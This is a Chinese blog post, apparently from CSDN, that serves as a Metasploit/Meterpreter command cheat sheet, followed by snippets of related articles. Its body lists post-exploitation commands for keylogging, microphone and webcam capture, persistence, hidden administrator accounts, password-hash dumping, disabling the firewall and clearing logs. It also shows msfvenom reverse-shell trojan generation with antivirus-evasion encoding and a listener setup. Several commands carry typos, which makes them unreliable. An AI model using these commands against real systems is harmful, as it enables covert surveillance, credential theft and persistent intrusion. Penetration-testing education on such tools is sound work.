MSF基本使用

最新推荐文章于 2024-08-10 06:01:36 发布
最新推荐文章于 2024-08-10 06:01:36 发布
阅读量2.6k 收藏 27
点赞数 6
分类专栏: 渗透工具 文章标签: MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/83618410
版权

MSF

在这里插入图片描述

链接数据库
linux查找文件
 find / -name dabase.yml
链接数据库   db_connect -y   path/database.yml
db_status  查询数据库链接状态

payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload)

background 后台
sessions  -i  1  返回
sessions  -l  列出所有session

getwd   查看远程主机当前路径
getlwd  查看本地当前路径
search  -d c:\\   -f  *.doc  查找文件
upload   3.jpg  c:\\1.jpg   上传文件
cat test.txt  查看文件
download  c:\\phpstudy\\wke.doc  /root/wke.doc  下载文件
route  查看路由
getpid  查看当前进程ID
execute -H -f  calc.exe  执行文件
shell  开启shell
kill杀死进程
sysinfo  列出系统信息
进程迁移
ps  查看所有正在运行的进程
getuid  获取当前进程的用户
migrate 进程号  迁移进程     explorer.exe为桌面进程
开启键盘
keyscan_start  开启键盘记录 (需要有管理员权限)
keyscan_dump  显示记录的信息
keyscan_stop 关闭键盘记录
录制声音
record-mic -d 10  录制声音10秒
开启摄像头
webcam_list  查看摄像头连接
webcam_chat  开启摄像头
webcam_stop 关闭摄像头
webcam_snap开摄像头截屏
webcam_stream -i 1 -v true
桌面截屏
screenshot  截屏
开启VNC
run  vnc  开启vnc
持久化访问
run metsvc  安装持久化访问  
run metsvc  -r   卸载安装
另一种方法
run persistence -X -i 5 -p 445 -r ip
创建 隐藏用户
net user hacker$ hacker /add  创建隐藏用户
net localgroup  admininistators  hacker$  /add  添加用户到管理员组

用getgui创建用户  并分配管理员权限   开启远程桌面
run getgui -u hacker  -p hacker
获取凭证(用户名和密码)
run post/windows/gather/hashdump
判断是否为虚拟机
run post/windows/gather/checkvm
获取目标主机最近的操作

run post/windows/gather/dumplinks

获取系统安装程序个补丁
run post/windows/gather/enum_applications
通过shell关闭防火墙
shell
netsh  adcfirewall ser allprofiles srate off
开启端口转发
portfwd add -l 1235  -r  10.10.10.129  -p 3389
这样就把远程主机的端口 映射到本机的1235端口
清除日志
 clearev 清除日志
kali链接windows桌面
rdesktop  -u  admin  -p  admin  ip:port
kali命令行与窗口化切换
init 3 命令行  5桌面
msfvenom生成木马
msfvenom  -p  windows/x64/meterpreter/reverse_tcp  lhost=10.10.10.128   lport=10001 -f exe > /root/config.exe
免杀木马
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=server.ngrok.cclport=00000 -f c

-p 指定payload,–e 编码器,-i 编码次数(次数越多免杀几率越高),-b 去除坏字符,lhost 服务器(ngrok默认为server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建议生成c)

木马的使用

设置tcp监听

use exploit/multi/handler
set payload   windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.128
ser lport 10001
run

远程主机运行木马

windows命令
net  use  查看网络链接
net  user  admin   123456   /add   添加用户
net  user   admin  密码    
net  user   admin    /del
浅笑⁹⁹⁶
关注
专栏目录
MSF基本使用基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 5879
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
msf 获取一个普通的session 控制windows
weixin_44286136的博客
05-19 2704
msf 获取session 在kali终端中打开msfconsole控制台 开启监听 use exploit/multi/handler 设置tcp监听 set payload windows/meterpreter/reverse_tcp 再次开启一个终端进行(shift+ctrl+T),查看本机ip 利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序
MSF使用教程
热门推荐
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
Metasploit Framework (MSF) 详解
最新发布
cxm4545的博客
08-10 1616
Metasploit Framework (简称MSF)是一款开源的渗透测试框架,它提供了数百个已知软件漏洞的专业级漏洞攻击工具和漏洞利用模块,为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。Kali里自带了MSF工具,使用命令 msfconsole 或者 双击MSF图标 即可以启动MSF。本篇就以Kali为实验环境来学习MSF
Msf 基本用法
freshfox的博客
02-28 604
Msf 基本用法 Msfconsole Help nmap -sn 192.168.208.0/24主机发现 渗透攻击过程需要xp用户登录系统后才可以利用成功。 1.search MS08-0672. use exploit/windows/smb/ms08_067_netapi use exploit/windows/smb...
MSF(metasploit)基本用法
qq_42908224的博客
03-20 2076
MSF简介 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针...
msf使用基础
qq_46804551的博客
05-03 649
前言 msf是后渗透神奇,在kali中已经内置有。 1.1 基础使用 metasploit程序需要使用postgresql数据库 手动启动数据库: service postgresql start 设置成开机启动数据库: systemctl enable postgresql 启动msf msfconsole 1.2.查找模块 search 模块名 //比如我要找永恒之蓝 search ms17_010 使用那个模块 use 模块名或use 前面的数字都可以 1.3使用模块 #查看要设置的参
MSF使用教程
qq_45317844的博客
07-12 1674
run autoroute -s 192.168.159.0/24 #添加到目标环境网络,当你相连接一个网络发现不通的时候,可以设置一个路由试试,一般网络中没有设置围栏的情况下,是可以通的。-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt。
MSF技术总结
05-07
二、MSF 基本使用和控制台命令 MSF Console 提供了丰富的命令,帮助用户快速完成渗透测试任务。常用的命令包括: * msfconsole:启动 MSF 控制台 * help:显示帮助信息 * -q:安静启动 MSF * -r:恢复以前的会话 *...
msf使用方法
06-29
### MSF基本操作 #### 启动MSF Web界面 通过`svn update ./msfweb`更新MSF Web界面,然后运行`./msfweb`,默认在本地地址`127.0.0.1`的`55555`端口启动Web界面。 #### 打开MSF控制台 执行`./msfconsole`命令,...
渗透工具之Kali MSF(metasploit framework)使用
赤赤三的博客
03-20 4754
初识MSF(渗透测试开源软件平台,一个漏洞利用框架,对计算机软件漏洞进行攻击) Kali查找MSF框架:cd /usr/share/metasploit-framework,进入windows攻击模块:cd /usr/share/metasploit-framework/modules/exploits/windows 学习路线:MSF了解------>安装MSF2-Linux靶机------->MSF基本使用方法------>MSF实战:攻击win7主机并远程执行命令|扫描靶机my
MSF使用
qq_63980959的博客
04-05 815
Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。
黑客常用的工具之---MSF使用(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
07-15 1380
MSF默认存放模块的目录如下。
MSF简单的使用教程
Bul1et的博客
10-24 9846
Kali自带MSF工具 假如此时nessus扫到了主机漏洞  比如ms.... 启动msf msfconsole 2.secrch ms模块 找到模块  使用模块 查看模块需要的命令   ip或者端口 使用set命令进行设置  ip或者端口 然后使用run命令  开始验证 ...
MSF(Metasploit Framework)详细教程
qq_41245301的博客
12-28 3211
Metasploit 是一个开源的渗透测试开源软件,也是一个逐步发展成熟的漏洞研究与渗透测试代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境,2009年10月,Metasploit项目被一家渗透测试技术领域的知名安全公司Rapid7所收购。Rapid7公司随后与2010年10月推出了Metasploit Express 和Pro商业版本。优点: 模块化,灵活框架,界面友好,简单易用,代码安全。
MSF使用详解
m0_52051132的博客
10-19 8100
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4818
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用
MSF使用说明
dakhda的博客
08-08 354
MSF是metasploit framework 的简称,是一个在全球使用十分广泛的渗透框架。MSF中有以下模块,分别为:exploitsauxiliarypostpayloadexcodersnopsevasion。
MSF基础与团队模型详解:原则、应用与CMMI比较
基本原则与团队模型是MSF的核心组成部分,涵盖了项目管理的关键要素。 首先,MSF基本原理强调了遵循一套标准化的流程和最佳实践,这些原则帮助项目经理和团队确保项目的高效运行。通过理解并应用这些基本原理,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值